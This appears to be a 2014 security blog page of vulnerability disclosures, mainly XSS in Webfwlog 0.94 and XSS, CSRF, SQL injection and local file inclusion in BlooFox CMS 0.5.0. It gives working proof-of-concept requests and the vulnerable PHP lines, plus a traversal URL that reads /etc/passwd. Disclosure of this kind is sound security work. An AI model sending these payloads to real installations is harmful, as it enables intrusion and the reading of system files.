Friday 31 January 2014

[EN] webfwlog-0.94 bugs

Last days I found 2 XSS in Webfwlog Firewall Log Analyzer.

1. XSS is here:

---<request>---
 GET /cms2/webfwlog-0.94/webfwlog/index.php?show_select_data_source="%3e%3cbody%2fonload%3dalert(3)%3e&restore=yes HTTP/1.1
Host: 10.149.14.58
(...)
Connection: close
---<request>---

Response should look like this:
---<response>---
<td align=left colspan="4">
<input type="hidden" name="show_select_data_source" value=""><body/onload=alert(3)>">
    <input type="submit" name="action" value="Select Data Source">
&nbsp;&nbsp;&nbsp;
---<response>---

2nd XSS is here:


---<request>--- 
POST /cms2/webfwlog-0.94/webfwlog/index.php HTTP/1.1
Host: 10.149.14.58
(...)
Content-Length: 173

page=home&report_order=Last+Accessed&show_select_data_source="%3e%3cbody%2fonload%3dalert(3)%3e&action=Select+Data+Source&ulog_table=&data_source=syslog&syslog_file=messages
---<request>---  


And response for this one:

---<response>---

<td align=left colspan="4">
<input type="hidden" name="show_select_data_source" value=""><body/onload=alert(3)>">
    <input type="submit" name="action" value="Select Data Source">
&nbsp;&nbsp;&nbsp;


---<response>---

So as we can see this is the same parameter use (but not filtered) in two places.

Anyway, cool code! ;)

[EN] BlooFox CMS 0.5.0 - Multiple vulnerabilities

Last days I saw that someone found few vulnerabilities in CMS I presented at my course.

I decide to check it again, and below you will find few informations about it ;)

Enjoy.

All vulnerabilities was found for admin user logged in. I didn't build the site ;)


1. Multiple XSS in error from MySQL:

Parameters:
lang_id, blocked, tmpl_id, urls, lang_id,  mod_rewrite,  meta_charset, 

meta_doctype, default_group, u1, u2, u7, u4, u30, u40, u8, u3, u5, u9, 
u20, status, group_id, page, backend, content, settings, permissions, 
tools, demo,object_w,object_d

Exaple request:
---<request>---
POST /k/bloofox/admin/index.php?mode=content&page=articles&action=new&page_id=0 HTTP/1.1
Host: 10.149.14.77
(...)
Content-Length: 116

title=asdasd&text=asdasd&insert=top&blocked='"%3e%3cbody%2fonload%3dalert(3)%3e&startdate=&enddate=&send=Add+Article

---<request>---

And:
---<response>---
HTTP/1.1 200 OK
Date: Thu, 30 Jan 2014 12:46:16 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.4-14+deb7u7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 448
Connection: close
Content-Type: text/html

</td></table><b>Database error:</b> Invalid SQL: INSERT INTO bfCMS_sys_content VALUES ('','','99965','','','asdasd','asdasd',''"><body/onload=alert(3)>','admin','1391085976','','','','')<br>
<b>MySQL Error</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"><body/onload=alert(3)>','admin','1391085976','','','','')' at line 1)<br>
<br>
Session halted.
---<response>---



2. CSRF (when adding project)
---<request>---POST /k/bloofox/admin/index.php?mode=settings&page=projects&action=new HTTP/1.1
Host:
(...)
Content-Length: 229

name=asdasd&lang_id=1&tmpl_id=1&urls=<CSRF_IS_POSSIBLE_HERE>&meta_title=asdasd&mod_rewrite=0&mail=&meta_copyright=&meta_desc=&meta_keywords=&meta_author=&meta_charset=ISO-8859-1&meta_doctype=XHTML+1.0+Transitional&default_group=1&send=Add+Project
---<request>---


3. Multiple SQL Injections

---<request>---
POST /k/bloofox/admin/index.php?mode=settings&page=projects&action=new HTTP/1.1
Host: 10.149.14.77
(...)
Content-Length: 263

name=asdasd&lang_id='"%3e%3cbody%2fonload%3dalert(3)%3e&tmpl_id=1&urls=asdasd&meta_title=asdasd&mod_rewrite=0&mail=&meta_copyright=&meta_desc=&meta_keywords=&meta_author=&meta_charset=ISO-8859-1&meta_doctype=XHTML+1.0+Transitional&default_group=1&send=Add+Project
---<request>---


Or here:


---<request>---

POST /k/bloofox/admin/index.php?mode=content&page=articles&action=new&page_id=0 HTTP/1.1
Host: 10.149.14.77
(...)
Content-Length: 116

title=asdasd&text=asdasd&insert=top&blocked='HERE&startdate=&enddate=&send=Add+Article
---<request>---

Or here:

---<request>---

POST /k/bloofox/admin/index.php?mode=settings&page=plugins&action=edit HTTP/1.1
Host: 10.149.14.77
(...)
Content-Length: 58

status='"%3e%3cbody%2fonload%3dalert(3)%3e&pid=1&send=Save
---<request>---


Parameters:
a) tmpl_id

---<code>---

./system/class_admincenter.php:119:            
$db->query("SELECT name FROM ".$tbl_prefix."sys_template WHERE tid = '".$tmpl_id."' ORDER BY tid");

---<code>---

b) urls

---<code>---

./admin/include/inc_settings_projects.php:130:                 
$db->query("UPDATE ".$tbl_prefix."sys_config SET urls = '".$_POST['urls']."' WHERE cid = '".$_POST['cid']."' LIMIT 1");

---<code>---
c) lang_id

---<code>---

./system/class_admincenter.php:104:            
$db->query("SELECT name FROM ".$tbl_prefix."sys_lang WHERE lid = '".$lang_id."' ORDER BY lid");
---<code>---

d) mod_rewrite

---<code>---


./admin/include/inc_settings_projects.php:146:                 
$db->query("UPDATE ".$tbl_prefix."sys_config SET mod_rewrite = '".$_POST['mod_rewrite']."' WHERE cid = '".$_POST['cid']."' LIMIT 1");

---<code>---

e) meta_charset

---<code>---


./admin/include/inc_settings_projects.php:142:                
$db->query("UPDATE ".$tbl_prefix."sys_config SET meta_charset = '".$_POST['meta_charset']."' WHERE cid = '".$_POST['cid']."' LIMIT 1");

---<code>---

f) meta_doctype

---<code>---


./admin/include/inc_settings_projects.php:143:                
$db->query("UPDATE ".$tbl_prefix."sys_config SET meta_doctype = '".$_POST['meta_doctype']."' WHERE cid = '".$_POST['cid']."' LIMIT 1");

---<code>---

g) default_group

---<code>---

./plugins/register_form_simple/register.php:
121: $db2->query("SELECT name FROM ".$tbl_prefix."sys_usergroup WHERE gid = '".$sys_config_vars["default_group"]."' ORDER BY gid");

---<code>---

h) from 'u1' to 'u11' and also u20,u30,u40 parametersŁ
---<code>---

k@lab:~/public_html/bloofox$ grep -n -r -e "UPDATE" ./ | grep "sys_setting SET setting_value =" | grep POST
./admin/include/inc_settings_general.php:27:    $db->query("UPDATE ".$tbl_prefix."sys_setting SET setting_value = '".$_POST['u1']."' WHERE sid = '1' LIMIT 1");
./admin/include/inc_settings_general.php:28:    $db->query("UPDATE ".$tbl_prefix."sys_setting SET setting_value = '".$_POST['u2']."' WHERE sid = '2' LIMIT 1");
./admin/include/inc_settings_general.php:29:    $db->query("UPDATE ".$tbl_prefix."sys_setting SET setting_value = '".$_POST['u3']."' WHERE sid = '3' LIMIT 1");
./admin/include/inc_settings_general.php:30:    $db->query("UPDATE ".$tbl_prefix."sys_setting SET setting_value = '".$_POST['u4']."' WHERE sid = '4' LIMIT 1");
./admin/include/inc_settings_general.php:31:    $db->query("UPDATE ".$tbl_prefix."sys_setting SET setting_value = '".$_POST['u5']."' WHERE sid = '5' LIMIT 1");
./admin/include/inc_settings_general.php:35:                    $db->query("UPDATE ".$tbl_prefix."sys_setting SET setting_value = '".$_POST['u6']."' WHERE sid = '6' LIMIT 1");
./admin/include/inc_settings_general.php:41:    $db->query("UPDATE ".$tbl_prefix."sys_setting SET setting_value = '".$_POST['u7']."' WHERE sid = '7' LIMIT 1");
./admin/include/inc_settings_general.php:42:    $db->query("UPDATE ".$tbl_prefix."sys_setting SET setting_value = '".$_POST['u8']."' WHERE sid = '8' LIMIT 1");
./admin/include/inc_settings_general.php:43:    $db->query("UPDATE ".$tbl_prefix."sys_setting SET setting_value = '".$_POST['u9']."' WHERE sid = '9' LIMIT 1");
./admin/include/inc_settings_general.php:47:                    $db->query("UPDATE ".$tbl_prefix."sys_setting SET setting_value = '".$_POST['u10']."' WHERE sid = '10' LIMIT 1");
./admin/include/inc_settings_general.php:57:                    $db->query("UPDATE ".$tbl_prefix."sys_setting SET setting_value = '".$_POST['u12']."' WHERE sid = '12' LIMIT 1");
./admin/include/inc_settings_general.php:65:    $db->query("UPDATE ".$tbl_prefix."sys_setting SET setting_value = '".$_POST['u20']."' WHERE sid = '20' LIMIT 1");
./admin/include/inc_settings_general.php:66:    $db->query("UPDATE ".$tbl_prefix."sys_setting SET setting_value = '".$_POST['u30']."' WHERE sid = '30' LIMIT 1");
./admin/include/inc_settings_general.php:67:    $db->query("UPDATE ".$tbl_prefix."sys_setting SET setting_value = '".$_POST['u40']."' WHERE sid = '40' LIMIT 1");
k@lab:~/public_html/bloofox$
---<code>---

i) status
---<code>---

./admin/include/inc_user_user.php:
434:          $db->query("SELECT uid FROM ".$tbl_prefix."sys_user WHERE status LIKE '".$_SESSION["filter_user"]."'");

./admin/include/inc_user_user.php:
442:          $db->query("SELECT * FROM ".$tbl_prefix."sys_user WHERE status LIKE '".$_SESSION["filter_user"]."' ORDER BY uid LIMIT ".$start.",".$limit."");

---<code>---

j) pid
---<code>---

./admin/include/inc_settings_plugins.php:
137:           $db->query("SELECT pid,name,status FROM ".$tbl_prefix."sys_plugin WHERE pid = '".$_GET['pid']."' ORDER BY pid LIMIT 1");
---<code>---   

Also:
backend, content, settings, permissions, tools, demo, object_w,object_d






4. Local file include:
http://ip/k/bloofox/admin/index.php?mode=settings&page=editor&fileurl=../../../../../../../../../../../../../../etc/passwd



Code:
---

k@lab:~/public_html/bloofox$ cat -n admin/include/inc_settings_editor.php |less
(...)

    60  if(isset($_GET["fileurl"])) {
    61          $fileurl = "../".$_GET["fileurl"];    [1]
    62  }
    63
    64  if(file_exists($fileurl)) {
    65          $filelength = filesize($fileurl);
    66          $readfile = fopen($fileurl,"r");    [2]
    67          $file = fread($readfile,$filelength);
    68          fclose($readfile);
    69  }

(...)
---



5. XSS over GEThttp://10.149.14.77/k/bloofox/admin/index.php?mode=settings&page=editor&fileurl='><body onload=alert(1)>
And so on... ;)


I suggest zou to read this source.
It is really interesting. ;)

[EN] Simple Machine Forum (SMF) 2.0.7 - XSS

In latest version of SMF I found a tricky XSS vulnerability.

As the vendor said, this is a low priority, because it can be exploited
only when admin user is logged in.

Post will be updated after patch release (in new version).


[EN] PrestaShop 1.5.6.2 - Multiple bugs

Last days I started to check code of latest PrestaShop and I found few vulnerabilities
in code.

Post will be updated as soon as vendor will answer, what does he think about it.


[EN] osCommerce 3.0.2 - Multiple XSS

In latest version of osCommerce (3.x line) I found few XSS bugs.

As they are only exploitable when admin user is logged in,
Support of osCommerce said that this is low priority bug.

It will not be published until patch release.

By the way I must say that Support Team was very fast in reply for my message,
so big plus guys! ;)